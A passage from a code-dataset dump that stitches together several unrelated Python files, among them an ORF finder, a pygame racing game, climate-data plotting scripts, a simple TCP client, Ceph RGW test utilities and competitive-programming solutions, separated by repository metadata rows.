    dna_r=dna_f[::-1].replace('A','t').replace('T','a').replace('C','g').replace('G','c').upper()
    # Six complete translations; 'X' padding keeps frames 2/3 aligned with
    # the DNA coordinates used when reporting positions.
    rf1=translate(dna_f,aa_aacodons,0)
    rf2='X'+translate(dna_f,aa_aacodons,1)
    rf3='XX'+translate(dna_f,aa_aacodons,2)
    rfr1=translate(dna_r,aa_aacodons,0)
    rfr2='X'+translate(dna_r,aa_aacodons,1)
    rfr3='XX'+translate(dna_r,aa_aacodons,2)
    # Scan each frame exactly once and reuse the [report, fasta] pair; the
    # previous version called orf_f/orf_r twice per frame, doubling the work.
    res1=orf_f(rf1,n)
    res2=orf_f(rf2,n)
    res3=orf_f(rf3,n)
    resr1=orf_r(rfr1,n)
    resr2=orf_r(rfr2,n)
    resr3=orf_r(rfr3,n)
    completeframes.write("-Open reading frames found in frame 1 (5'-3'): "+'\n\n')
    completeframes.write(res1[0])
    completeframes.write("-Open reading frames found in frame 2 (5'-3'): "+'\n\n')
    completeframes.write(res2[0])
    completeframes.write("-Open reading frames found in frame 3 (5'-3'): "+'\n\n')
    completeframes.write(res3[0])
    completeframes.write("-Open reading frames found in frame 1 (3'-5'): "+'\n\n')
    completeframes.write(resr1[0])
    completeframes.write("-Open reading frames found in frame 2 (3'-5'): "+'\n\n')
    completeframes.write(resr2[0])
    completeframes.write("-Open reading frames found in frame 3 (3'-5'): "+'\n\n')
    completeframes.write(resr3[0])
    # FASTA records for each frame.
    orf_fasta1.write(res1[1])
    orf_fasta2.write(res2[1])
    orf_fasta3.write(res3[1])
    orf_fasta_r1.write(resr1[1])
    orf_fasta_r2.write(resr2[1])
    orf_fasta_r3.write(resr3[1])
# Flush and close the outputs explicitly instead of relying on interpreter
# shutdown to do it.
completeframes.close()
orf_fasta1.close()
orf_fasta2.close()
orf_fasta3.close()
orf_fasta_r1.close()
orf_fasta_r2.close()
orf_fasta_r3.close()
print('''\nThanks for using the ORF finder tool, Valar Morghulis.
Press enter to save the files''')
enter_to_finish=input('')
|
[
"noreply@github.com"
] |
Omaramin81297.noreply@github.com
|
cf77b87e3e07bb149533bb8be1fcbed9593f35ef
|
552976e9ff2d7836c5ec7965950fb80ad78ba831
|
/firstpygame.py
|
293fb9c727a65bfb2274d5b6de3ffccdcd6b5965
|
[] |
no_license
|
mickey2798/pygame
|
4312ab8975a2787814e1ca969190535d63ca038f
|
ffacb3a07e72e3a9c6ea9f1c6a159c5247c81718
|
refs/heads/master
| 2020-06-29T18:05:22.522241
| 2019-08-05T05:31:55
| 2019-08-05T05:31:55
| 200,587,202
| 0
| 1
| null | 2019-10-21T20:17:51
| 2019-08-05T05:20:17
|
Python
|
UTF-8
|
Python
| false
| false
| 6,861
|
py
|
import pygame
import time
import random

pygame.init()  # Initialise all pygame modules.

# Sound assets; the .wav files must sit next to the script.
crash_sound = pygame.mixer.Sound("Crash.wav")
pygame.mixer.music.load("Race_Car.wav")

# Window geometry.
display_width = 800  # width of the window
display_height = 500  # height of the window

# Colour palette (RGB). 'bright_*' variants are the button hover colours.
black = (0,0,0)
white = (255,255,255)
red = (200,0,0)
green = (0,200,0)
bright_red =(255,0,0)
bright_green =(0,255,0)
block_color = (53,115,255)

# Car sprite width in pixels, used for edge and collision checks.
car_width = 73

gameDisplay = pygame.display.set_mode((display_width,display_height))
pygame.display.set_caption("RACEY")  # Window title.
clock = pygame.time.Clock()

carImg = pygame.image.load('racecar.png')  # Car sprite.
pygame.display.set_icon(carImg)

# Global pause flag shared by game_loop()/paused()/unpause().
pause = False
def things_dodged(count):
    """Render the running dodge counter in the top-left corner."""
    score_font = pygame.font.SysFont(None, 25)
    score_surface = score_font.render("Dodged: " + str(count), True, black)
    gameDisplay.blit(score_surface, (0, 0))
def things(thingx,thingy ,thingw,thingh,color): #it basically draws the obstacle.
    # NOTE(review): the 'color' parameter is ignored -- the obstacle is always
    # drawn in block_color, even though callers pass 'black'. Confirm intent.
    pygame.draw.rect(gameDisplay,block_color,[thingx,thingy,thingw,thingh])
# Draw the car sprite.
def car(x,y):
    # Blit with the sprite's top-left corner at (x, y).
    gameDisplay.blit(carImg, (x,y))
def text_objects(text, font):
    """Render *text* in black with *font*; return (surface, bounding rect)."""
    rendered = font.render(text, True, black)
    bounds = rendered.get_rect()
    return rendered, bounds
def message_display(text):
    """Flash *text* centred on screen for two seconds, then restart the game.

    NOTE(review): restarting by calling game_loop() from here never unwinds,
    so the call stack grows on every crash; fine for a toy game.
    """
    largeText = pygame.font.Font('freesansbold.ttf',115)
    TextSurf, TextRect = text_objects(text, largeText)
    TextRect.center = ((display_width/2),(display_height/2))
    gameDisplay.blit(TextSurf , TextRect)
    pygame.display.update()
    time.sleep(2)
    game_loop()
def button(msg ,x,y,w,h,i,a,action=None):
    """Draw an interactive rectangular button and fire its callback.

    msg        -- label text
    x, y, w, h -- rectangle position and size
    i          -- idle colour; a -- hover (active) colour
    action     -- zero-argument callback invoked while the left mouse
                  button is held down over the rectangle
    """
    mouse = pygame.mouse.get_pos()
    click = pygame.mouse.get_pressed()
    # Hover: pointer inside the rectangle -> highlight and maybe fire.
    if x+w > mouse[0] > x and y+h > mouse[1] > y:
        pygame.draw.rect(gameDisplay,a,(x,y,w,h))
        if click[0] == 1 and action != None:
            action()
    else:
        pygame.draw.rect(gameDisplay,i,(x,y,w,h))
    # Centre the label inside the rectangle.
    smallText = pygame.font.Font("freesansbold.ttf",20)
    textSurf, textRect = text_objects(msg,smallText)
    textRect.center = ((x+(w/2),y+(h/2)))
    gameDisplay.blit(textSurf ,textRect)
def quitgame():
    """Shut pygame down and exit the interpreter."""
    pygame.quit()
    quit()
def unpause():
    """Resume the music and clear the global pause flag read by paused()."""
    global pause
    pygame.mixer.music.unpause()
    pause = False
def paused():
    """Pause screen: halt the music and spin until unpause() or quit."""
    pygame.mixer.music.pause()
    largeText = pygame.font.SysFont("comicsansms",115)
    TextSurf, TextRect = text_objects("Paused", largeText)
    TextRect.center = ((display_width/2),(display_height/2))
    gameDisplay.blit(TextSurf, TextRect)
    # Loop until unpause() flips the global flag; buttons fire while clicked.
    while pause:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        button("Continue",150,400,100,50,green,bright_green,unpause)
        button("Quit",550,400,100,50,red,bright_red,quitgame)
        pygame.display.update()
        clock.tick(15)
def crash():
    """Stop the music, play the crash sound and show the game-over message."""
    pygame.mixer.music.stop()
    pygame.mixer.Sound.play(crash_sound)
    message_display('DISHOOM')
def game_intro():
    """Title screen: loop until GO! (runs game_loop) or QUIT is clicked.

    NOTE(review): 'intro' is never set False -- the loop only exits through
    the button callbacks or the window-close event.
    """
    intro = True
    while intro:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        gameDisplay.fill(white)
        largeText = pygame.font.Font('freesansbold.ttf',115)
        TextSurf, TextRect = text_objects("RACE 4", largeText)
        TextRect.center = ((display_width/2),(display_height/2))
        gameDisplay.blit(TextSurf , TextRect)
        button("GO!",150,400,100,50,green,bright_green,game_loop)
        button("QUIT!!",550,400,100,50,red,bright_red,quitgame)
        pygame.display.update()
        clock.tick(15)
def game_loop():
    """Main game loop: steer the car, scroll obstacles, detect collisions."""
    global pause
    pygame.mixer.music.play(-1)

    # Car start position and horizontal velocity.
    x = (display_width * 0.45)
    y = (display_height * 0.8)
    x_chnge = 0

    # First obstacle spawns above the visible screen.
    thing_startx = random.randrange(0,display_width)
    thing_starty = -600
    thing_speed = 7
    thing_width = 100
    thing_height = 100

    dodged = 0
    gameExit = False

    while not gameExit:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                gameExit = True
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_LEFT:
                    x_chnge =-5
                elif event.key == pygame.K_RIGHT:
                    x_chnge =5
                if event.key == pygame.K_p:
                    pause = True
                    paused()
            if event.type == pygame.KEYUP:
                if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
                    x_chnge = 0

        x += x_chnge
        gameDisplay.fill(white)

        things(thing_startx, thing_starty,thing_width,thing_height,black)
        thing_starty += thing_speed
        car(x,y)
        things_dodged(dodged)

        # Driving off either edge of the road is a crash.
        if x > display_width - car_width or x < 0:
            crash()

        # Obstacle left the bottom: respawn on top, speed up and widen.
        if thing_starty > display_height:
            thing_starty = 0 - thing_height
            thing_startx = random.randrange(0,display_width)
            dodged += 1
            thing_speed += 1
            thing_width += (dodged *1.2)

        if y < thing_starty + thing_height:
            print('Y_crossOver')
            # BUGFIX: the right-edge test previously compared against
            # thing_startx + car_width, so the car could clip the right
            # side of widened obstacles without crashing.
            if x > thing_startx and x < thing_startx + thing_width or x+car_width > thing_startx and x + car_width < thing_startx + thing_width:
                print('X_crossOver')
                crash()

        pygame.display.update()  # Refresh the whole screen.
        clock.tick(60)  # Cap at 60 fps.
# Entry point: title screen first, then the game until the player quits.
game_intro()
game_loop()
pygame.quit()
quit()
|
[
"noreply@github.com"
] |
mickey2798.noreply@github.com
|
1990d0596ab619757836e2881680fcfddc198492
|
f441d86d1de8e1d75057f5c8c92ae012c2e35b92
|
/GEOS_Util/coupled_diagnostics/verification/HadISST/enso_plots.py
|
289e5c5a87261cc0ff512d2e37a3b92c8396b323
|
[] |
no_license
|
ddlddl58/GMAO_Shared
|
95f992e12b926cf9ec98163d6c62bac78e754efa
|
e16ddde5c8fab83429d312f5cff43643d9f84c94
|
refs/heads/master
| 2021-05-20T20:46:26.035810
| 2020-04-01T20:32:10
| 2020-04-01T20:32:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,241
|
py
|
import os, pickle
import matplotlib.pyplot as pl
import matplotlib.dates as mdates
import scipy as sp
from mpl_toolkits.basemap.cm import sstanom
from my_lib import plotters

# Dataset/variable under verification and all derived file locations.
dsetname='HadISST'
varname='sst'
path=os.environ['NOBACKUP']+'/verification/'+dsetname
indfile=path+'/data/'+varname+'_pc1.dat'
indpic=path+'/pics/'+varname+'_pc1.png'
indtitle='HadISST PC1'; xlab='years'
indylim=(-3,3); tint=10
eoffile=path+'/data/'+varname+'_eof1.dat'
eofpic=path+'/pics/'+varname+'_eof1.png'
units='$^0$C'
copts={'levels': sp.arange(-1,1.1,0.1),\
       'cmap': sstanom}
cbar_opts={'orientation': 'vertical'}

try:
    os.makedirs(path+'/pics')
except OSError:
    # Output directory already exists.
    pass

# Read data. Pickles are binary: open with 'rb' (text mode breaks under
# Python 3 and is unsafe for binary pickle protocols) and let the context
# managers close the files.
with open(indfile, 'rb') as f:
    pc = pickle.load(f)
with open(eoffile, 'rb') as f:
    eof = pickle.load(f)

# Normalize the PC by its standard deviation; scale the EOF to compensate.
s=pc.ave(0,ret_std=True)[1].data
pc.data/=s
eof.data*=s
pc.name=indtitle

# Plot the PC1 time series.
pl.figure(1,figsize=(12,4)); pl.clf()
pc.d(); ax=pl.gca()
ax.set_xlabel(xlab); ax.set_ylim(indylim)
ax.xaxis.set_major_locator(mdates.YearLocator(tint))
pl.grid(); pl.show()
pl.savefig(indpic)

# Plot EOF1 on a map.
pp=plotters.GeoPlotter()
eof.units=units; pp.copts.update(copts); pp.cbar_opts.update(cbar_opts)
pl.figure(2); pl.clf()
pp(eof)
pl.grid(); pl.show()
pl.savefig(eofpic)
|
[
"yury.v.vikhliaev@nasa.gov"
] |
yury.v.vikhliaev@nasa.gov
|
a4250f787cf24fcae3b3e2b83b946e3b4e12fff5
|
d77104b7bf6c1f955710cd432d1c3f3088763180
|
/Term2/Session 18/1-regex.py
|
82d12492c20476f4e7a348f852282101fbd47dcb
|
[
"MIT"
] |
permissive
|
theseana/apondaone
|
51d3f6887f029535ec6cb71afcab1a876c3655ba
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
refs/heads/main
| 2023-03-17T22:32:45.546061
| 2021-03-08T15:34:40
| 2021-03-08T15:34:40
| 303,436,958
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
import re
import requests
from myFUnction import download_image

# Scrape the listing page and download every PNG image it embeds.
PAGE_URL = "https://bama.ir/car/ssang-yong/actyon"

response = requests.get(PAGE_URL)
png_links = re.findall(r'<img src="(.+\.png)"', response.text)

for png_link in png_links:
    download_image(png_link)
|
[
"info@poulstar.com"
] |
info@poulstar.com
|
6459dde0ebd78814634cd97b178ebb5603a4fdca
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02911/s420554588.py
|
6c9a8426c8167fb4419c378a6a8f264c8e0fad7f
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 337
|
py
|
import math
import collections
import itertools


def resolve():
    """Read N K Q and Q one-based answer indices from stdin.

    Each of the Q answers deducts one point from everyone except the
    answering player; player i survives when K - (Q - own_answers) > 0.
    Prints "Yes"/"No" per player, one line each.
    """
    n, k, q = map(int, input().split())
    answered = [0] * n
    for _ in range(q):
        winner = int(input())
        answered[winner - 1] += 1
    for player in range(n):
        print("Yes" if k - q + answered[player] > 0 else "No")


resolve()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
bdd3c7e8e6514e559516ca85c27d3d7345152a4a
|
9c41041b4946b90164f27fee532dfca228f947dd
|
/script/local_get.py
|
9951527129e28c79a63daf5bcb549697ea614dff
|
[] |
no_license
|
qiwei94/tcp_wan_test
|
164aaf33ab0130a30c2c251fea99243e266a8616
|
fd7354fa77d45be78d0510bc88ddb64a8e3dbf86
|
refs/heads/master
| 2020-03-14T10:11:49.309348
| 2018-05-05T06:04:13
| 2018-05-05T06:04:13
| 131,561,000
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 340
|
py
|
#!/usr/bin/env python
# TCP-Client
import socket
import sys
import threading
import time
from multiprocessing import Process
sk_obj=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sk_obj.connect(('127.0.0.1',8001))
while True:
data = sk_obj.recv(8096)
print 'Server send information : %s' % data.decode('utf-8')
sk_obj.close()
|
[
"qiweizhang8523@gmail.com"
] |
qiweizhang8523@gmail.com
|
c74ae9036ab04c6041e27b5582f39fdd95f30a36
|
43fa11ba35c2df0c7a144e282fa9cdf105153c1e
|
/rgw/v1/utils/utils.py
|
d6f4dd1fe0c9e87e7f09bb93a599faac36f672e0
|
[] |
no_license
|
sidhant-agrawal/ceph-qe-scripts
|
d11451c771617d8776a075fcac8dd3a25f8319d6
|
729541d1d9f996015d9374178836cfca366e906c
|
refs/heads/master
| 2020-05-30T20:12:28.090434
| 2019-03-06T05:44:13
| 2019-03-06T05:44:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,414
|
py
|
import os
import hashlib
import subprocess
import log
import json
from random import randint
import ConfigParser
import yaml
def exec_shell_cmd(command):
    """Run *command* through the shell and capture its stdout.

    Returns (True, stdout_bytes) on success or (False, error_text) when
    spawning/reading the process raises.  A non-zero exit status from the
    command itself is NOT treated as failure, matching the contract the
    callers in this module rely on.
    """
    try:
        print('executing command: %s' % command)
        proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
        # communicate() reads stdout to EOF and reaps the child, avoiding
        # the zombie process a bare stdout.read() leaves behind.
        out, _ = proc.communicate()
        return True, out
    except (Exception, subprocess.CalledProcessError) as e:
        print('command failed')
        # Not every exception carries .output/.returncode; getattr keeps
        # the handler itself from raising AttributeError.
        error = str(getattr(e, 'output', e)) + " " + str(getattr(e, 'returncode', ''))
        print(error)
        return False, error
def get_md5(fname):
    """Return the hex MD5 digest of the file at *fname*."""
    log.info('fname: %s' % fname)
    # The handle is never closed explicitly; CPython refcounting reclaims it.
    return hashlib.md5(open(fname, 'rb').read()).hexdigest()
def get_file_size(min, max):
    """Return a random size in [min, max] that is a multiple of 5.

    (Parameter names kept for interface compatibility, even though they
    shadow the builtins.)  Draws repeatedly until a multiple of 5 comes up.
    """
    candidate = randint(min, max)
    while candidate % 5 != 0:
        candidate = randint(min, max)
    return candidate
def create_file(fname, size):
    """Create a sparse file of *size* megabytes; return its absolute path."""
    total_bytes = size * 1024 * 1024
    handle = open(fname, 'wb')
    try:
        # truncate() extends the file to the requested length without
        # writing data blocks.
        handle.truncate(total_bytes)
    finally:
        handle.close()
    return os.path.abspath(fname)
def split_file(fname, size_to_split=5):
    """Split *fname* into size_to_split-MB chunks via the 'split' utility.

    Returns False on failure, None on success (callers treat any non-False
    result as ok).
    """
    try:
        split_cmd = "split" + " " + '-b' + str(size_to_split) + "m " + fname
        subprocess.check_output(split_cmd, shell=True, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        # NOTE(review): e.output is bytes on Python 3, so this concatenation
        # would itself raise there -- presumably Python 2 code; verify.
        error = e.output + str(e.returncode)
        log.error(error)
        return False
class FileOps(object):
    """Tiny reader/writer keyed on a format tag.

    Supported type tags: 'json', 'txt', 'ceph.conf', 'yaml' (and None on
    the write path, treated like ceph.conf-style objects).
    """
    def __init__(self, filename, type):
        # 'type' selects the (de)serialiser used by get_data()/add_data().
        self.type = type
        self.fname = filename
    def get_data(self):
        """Read and parse the file; returns parsed data (format-dependent)."""
        data = None
        with open(self.fname, 'r') as fp:
            if self.type == 'json':
                data = json.load(fp)
            if self.type == 'txt' or self.type == 'ceph.conf' :
                raw_data = fp.readlines()
                # Strip trailing newlines from each line.
                tmp = lambda x: x.rstrip('\n')
                data = map(tmp, raw_data)
            if self.type == 'yaml':
                # NOTE(review): yaml.load without an explicit Loader is
                # unsafe on untrusted input; consider yaml.safe_load.
                data = yaml.load(fp)
            fp.close()  # Redundant: the with-block already closes fp.
        return data
    def add_data(self, data):
        """Serialise *data* to the file using the configured format."""
        with open(self.fname, "w") as fp:
            if self.type == 'json':
                json.dump(data, fp, indent=4)
            if self.type == 'txt':
                fp.write(data)
            if self.type == 'ceph.conf':
                # ConfigParser-style objects write themselves to a handle.
                data.write(fp)
            elif self.type is None:
                data.write(fp)
            elif self.type == 'yaml':
                yaml.dump(data, fp, default_flow_style=False)
            fp.close()  # Redundant: the with-block already closes fp.
class ConfigParse(object):
    """Convenience wrapper around ConfigParser for a single file."""
    def __init__(self, fname):
        self.fname = fname
        self.cfg = ConfigParser.ConfigParser()
        self.cfg.read(fname)
    def set(self, section, option, value=None):
        """Set *option* in *section*; return the underlying parser."""
        self.cfg.set(section, option, value)
        return self.cfg
    def add_section(self, section):
        """Add *section*, tolerating duplicates; return the parser."""
        try:
            self.cfg.add_section(section)
            return self.cfg
        # FIX: 'except Err, e' is Python-2-only syntax; 'as' is valid on
        # both Python 2.6+ and Python 3.
        except ConfigParser.DuplicateSectionError as e:
            log.info('section already exists: %s' % e)
            return self.cfg
def make_copy_of_file(f1, f2):
    """
    copy f1 to f2 location
    """
    status = exec_shell_cmd('sudo cp %s %s' % (f1, f2))
    if status[0]:
        # Copy succeeded: hand back the destination's absolute path.
        return os.path.abspath(f2)
    # Copy failed: propagate the (False, error) tuple.
    return status
class RGWService(object):
    """systemctl helpers for the ceph-radosgw service target."""
    def __init__(self):
        pass
    def restart(self):
        """Restart the radosgw target; return True on shell success."""
        executed = exec_shell_cmd('sudo systemctl restart ceph-radosgw.target')
        return executed[0]
    def stop(self):
        """Stop the radosgw target; return True on shell success."""
        executed = exec_shell_cmd('sudo systemctl stop ceph-radosgw.target')
        return executed[0]
    def start(self):
        """Start the radosgw target; return True on shell success."""
        # BUGFIX: previously ran 'systemctl stop', copy-pasted from stop().
        executed = exec_shell_cmd('sudo systemctl start ceph-radosgw.target')
        return executed[0]
def get_radosgw_port_no():
    """Return the TCP port radosgw is listening on, parsed from netstat."""
    op = exec_shell_cmd('sudo netstat -nltp | grep radosgw')
    # op[1] is the raw netstat output; the first token containing ':' is the
    # local address, whose part after the colon is the port number.
    x = op[1].split(" ")
    port = [i for i in x if ':' in i][0].split(':')[1]
    log.info('radosgw is running in port: %s' % port)
    return port
def get_all_in_dir(path):
    """Recursively collect and return the paths of all files under *path*."""
    # Renamed from 'all', which shadowed the builtin of the same name.
    collected = []
    for dirName, subdirList, fileList in os.walk(path):
        print('%s' % dirName)
        log.info('dir_name: %s' % dirName)
        for fname in fileList:
            log.info('filename: %s' % os.path.join(dirName,fname))
            collected.append(os.path.join(dirName,fname))
        log.info('----------------')
    return collected
|
[
"rgowdege@redhat.com"
] |
rgowdege@redhat.com
|
4165714b6915a4d0588888e11735294fe601d2ab
|
899d17821348c0dad9ef98a25828df0edeabbccc
|
/b64_to_raw.py
|
e1459cd841c2391375212a47684a6e5030cd8045
|
[
"BSD-3-Clause"
] |
permissive
|
tstellanova/px4flow_bsp
|
35302ebf9a62a26c6e4cf66586e66f9b9a7b3285
|
751151cb0c826148013b0709e7a246a9d9ca774d
|
refs/heads/trunk
| 2022-12-18T11:57:50.922431
| 2020-09-30T23:11:38
| 2020-09-30T23:11:38
| 276,243,760
| 5
| 0
|
BSD-3-Clause
| 2020-09-16T16:32:16
| 2020-07-01T01:06:37
|
Rust
|
UTF-8
|
Python
| false
| false
| 409
|
py
|
#!/usr/bin/env python
import base64

# Convert a base64 dump of camera pixel values into a RAW binary image file;
# used to verify pixel transfer from the camera sensor.
with open('sessions/out18.b64', 'r') as encoded_file:
    encoded_text = encoded_file.read()

raw_bytes = base64.b64decode(encoded_text)

with open('sessions/out18.raw', 'wb') as raw_file:
    raw_file.write(raw_bytes)
|
[
"tstellanova@users.noreply.github.com"
] |
tstellanova@users.noreply.github.com
|
0d69e287559d424fa5af284dac9aa10f43cfe0e6
|
ae48c2a1fa0c4776ec2cc79281cd3ebb9ade0c4d
|
/site/solutions/DMOJ/cco15p2.py
|
fd2d3a98ceb050b352540d4251cf518de9537edc
|
[] |
no_license
|
shunr/cbcs-docs
|
c9cac20de9624fcfaed7a753a28c91993909d830
|
42b065fa6f8d80c50ae9d724d8d777b2a41df7d6
|
refs/heads/master
| 2021-01-23T00:56:44.540801
| 2017-09-23T01:48:32
| 2017-09-23T01:48:32
| 92,857,947
| 1
| 2
| null | 2017-09-23T01:48:33
| 2017-05-30T17:19:43
|
HTML
|
UTF-8
|
Python
| false
| false
| 664
|
py
|
import sys
from collections import defaultdict
# Fast input: rebind input() to sys.stdin.readline for large test data.
input = sys.stdin.readline
# n nodes, m directed weighted edges.
n, m = (int(i) for i in input().split())
graph = defaultdict(list)  # graph[b] lists the tails a of edges a->b
weights = {}               # weights[(a, b)] = weight of edge a->b
# dp[node][visited_bitmask] memo table used by meme() below.
dp = [[0 for i in range(300000)] for j in range(18)]
for i in range(m):
    a, b, c = (int(i) for i in input().split())
    graph[b].append(a)
    weights[(a,b)] = c
def meme(dp, G, w, s, x, path):
    """Memoized longest weighted path from node *s* to node *x*.

    G maps each node to the tails of its incoming edges, w maps (tail,
    head) to the edge weight, and *path* is a visited-node bitmask.
    Results are cached in dp[x][path] (0 means "not yet computed").
    """
    if x == s:
        return 0
    if dp[x][path] != 0:
        return dp[x][path]
    best = -999999
    for pred in G[x]:
        if not path & (1 << pred):
            candidate = meme(dp, G, w, s, pred, path | (1 << pred)) + w[(pred, x)]
            if candidate > best:
                best = candidate
    dp[x][path] = best
    return dp[x][path]
# Answer: best path weight into node n-1, with n-1 pre-marked as visited.
print(meme(dp, graph, weights, 0, n-1, 0 | (1 << n-1)))
|
[
"shunyu.rao@gmail.com"
] |
shunyu.rao@gmail.com
|
e0f7c9c4ff181962b241cec1ff3ce7014bc8570c
|
b04aa637ae8a53276eed9f4d40b17f41101d9c7f
|
/Scripts/plot_ProfileVar_Monthly_100yrPeriods.py
|
02d599d64023bc68467e98c53064020719153a4e
|
[
"MIT"
] |
permissive
|
zmlabe/StratoVari
|
a442adef7eef3a4ade0fa87e5d49ac382287307f
|
c5549f54482a2b05e89bded3e3b0b3c9faa686f3
|
refs/heads/master
| 2021-06-18T06:21:04.291186
| 2021-04-01T16:37:24
| 2021-04-01T16:37:24
| 193,129,384
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,727
|
py
|
"""
Plot vertical plots of PAMIP data for each month from November to April using
the ensemble mean (300)
Notes
-----
Author : Zachary Labe
Date : 26 June 2019
"""
### Import modules
import numpy as np
import matplotlib.pyplot as plt
import datetime
import read_MonthlyData as MO
import calc_Utilities as UT
import cmocean
import itertools
### Define directories (input simulations and figure output)
directorydata = '/seley/zlabe/simu/'
directoryfigure = '/home/zlabe/Desktop/STRATOVARI/'
#directoryfigure = '/home/zlabe/Documents/Research/SITperturb/Figures/'

### Define time stamp used in the startup banner
now = datetime.datetime.now()
currentmn = str(now.month)
currentdy = str(now.day)
currentyr = str(now.year)
currenttime = currentmn + '_' + currentdy + '_' + currentyr
titletime = currentmn + '/' + currentdy + '/' + currentyr
print('\n' '----Plotting Monthly Vertical Profiles- %s----' % titletime)

### Allot time series (300 ensemble members)
year1 = 1701
year2 = 2000
years = np.arange(year1,year2+1,1)

###############################################################################
### Variables to plot: zonal wind, geopotential, temperature, meridional
### wind, Eady growth rate
varnames = ['U','GEOP','TEMP','V','EGR']
######################
def readDataPeriods(varnames,sliceq):
    """Read one variable's Future/Current profiles and compute anomalies.

    varnames -- single variable name (e.g. 'U'); sliceq selects the
    ensemble subset: 'Mean' (all members) or 'A'/'B'/'C' (members 0-99,
    100-199, 200-299).  Returns (zdiffruns, zclimo, pruns, lat, lon, lev):
    monthly zonal-mean anomaly, climatology, and t-test p-values.
    Assumes 5-D arrays (ens, month, lev, lat, lon) -- TODO confirm against
    read_MonthlyData.readExperiAll.
    """
    ### Call function for 4d variable data
    lat,lon,lev,varfuture = MO.readExperiAll(varnames,'Future','profile')
    lat,lon,lev,varpast = MO.readExperiAll(varnames,'Current','profile')
    ### Select ensemble member period
    if sliceq == 'Mean':
        varfuture = varfuture[:,:,:,:,:]
        varpast = varpast[:,:,:,:,:]
    elif sliceq == 'A':
        varfuture = varfuture[:100,:,:,:,:]
        varpast = varpast[:100,:,:,:,:]
    elif sliceq == 'B':
        varfuture = varfuture[100:200,:,:,:,:]
        varpast = varpast[100:200,:,:,:,:]
    elif sliceq == 'C':
        varfuture = varfuture[200:,:,:,:,:]
        varpast = varpast[200:,:,:,:,:]
    ### Create 2d array of latitude and longitude
    lon2,lat2 = np.meshgrid(lon,lat)
    ### Remove missing data (fill values are large negative numbers)
    varfuture[np.where(varfuture <= -1e10)] = np.nan
    varpast[np.where(varpast <= -1e10)] = np.nan
    ### Rearrange months into the cold season order (N,D,J,F,M,A)
    varfuturem = np.append(varfuture[:,-2:,:,:,:],varfuture[:,:4,:,:,:],
                           axis=1)
    varpastm = np.append(varpast[:,-2:,:,:,:],varpast[:,:4,:,:,:],axis=1)
    ### Calculate zonal means (average over longitude)
    varfuturemz = np.nanmean(varfuturem,axis=4)
    varpastmz = np.nanmean(varpastm,axis=4)
    ### Calculate anomalies (Future minus Current)
    anompi = varfuturemz - varpastmz
    ### Calculate ensemble mean
    anompim = np.nanmean(anompi,axis=0)
    zdiffruns = anompim
    ### Calculate climatologies from the Current experiment
    zclimo = np.nanmean(varpastmz,axis=0)
    ### Calculate significance (independent t-test) for each month
    stat_past = np.empty((varpastmz.shape[1],len(lev),len(lat)))
    pvalue_past= np.empty((varpastmz.shape[1],len(lev),len(lat)))
    for i in range(varpastmz.shape[1]):
        stat_past[i],pvalue_past[i] = UT.calc_indttest(varfuturemz[:,i,:,:],
                                                       varpastmz[:,i,:,:])
    pruns = pvalue_past
    return zdiffruns,zclimo,pruns,lat,lon,lev
###########################################################################
###########################################################################
###########################################################################
### Read in data
# For each variable: build a 4x6 grid of panels (rows = Mean/A/B/C ensemble
# slices, columns = months Nov-Apr) of zonal-mean vertical profiles.
for v in range(len(varnames)):
    diffm,climom,pvalm,lat,lon,lev = readDataPeriods(varnames[v],'Mean')
    diffa,climoa,pvala,lat,lon,lev = readDataPeriods(varnames[v],'A')
    diffb,climob,pvalb,lat,lon,lev = readDataPeriods(varnames[v],'B')
    diffc,climoc,pvalc,lat,lon,lev = readDataPeriods(varnames[v],'C')
    ### Flatten to 24 panels: rows (Mean,A,B,C) x 6 months
    zdiffruns = list(itertools.chain(*[diffm,diffa,diffb,diffc]))
    zclimo = list(itertools.chain(*[climom,climoa,climob,climoc]))
    pruns = list(itertools.chain(*[pvalm,pvala,pvalb,pvalc]))
    ### Plot Variables
    plt.rc('text',usetex=True)
    plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
    ### Set limits for contours and colorbars (per variable)
    if varnames[v] == 'U':
        limit = np.arange(-2,2.1,0.1)
        barlim = np.arange(-2,3,1)
    elif varnames[v] == 'TEMP':
        limit = np.arange(-4,4.1,0.2)
        barlim = np.arange(-4,5,1)
    elif varnames[v] == 'GEOP':
        limit = np.arange(-60,61,2)
        barlim = np.arange(-60,61,30)
    elif varnames[v] == 'V':
        limit = np.arange(-0.2,0.21,0.02)
        barlim = np.arange(-0.2,0.3,0.1)
    elif varnames[v] == 'EGR':
        limit = np.arange(-0.08,0.081,0.005)
        barlim = np.arange(-0.08,0.09,0.04)
    ### Pressure levels labeled on the (log) y-axis
    zscale = np.array([1000,700,500,300,200,
                       100,50,30,10])
    latq,levq = np.meshgrid(lat,lev)
    fig = plt.figure()
    for i in range(len(zdiffruns)):
        ax1 = plt.subplot(4,6,i+1)
        ax1.spines['top'].set_color('dimgrey')
        ax1.spines['right'].set_color('dimgrey')
        ax1.spines['bottom'].set_color('dimgrey')
        ax1.spines['left'].set_color('dimgrey')
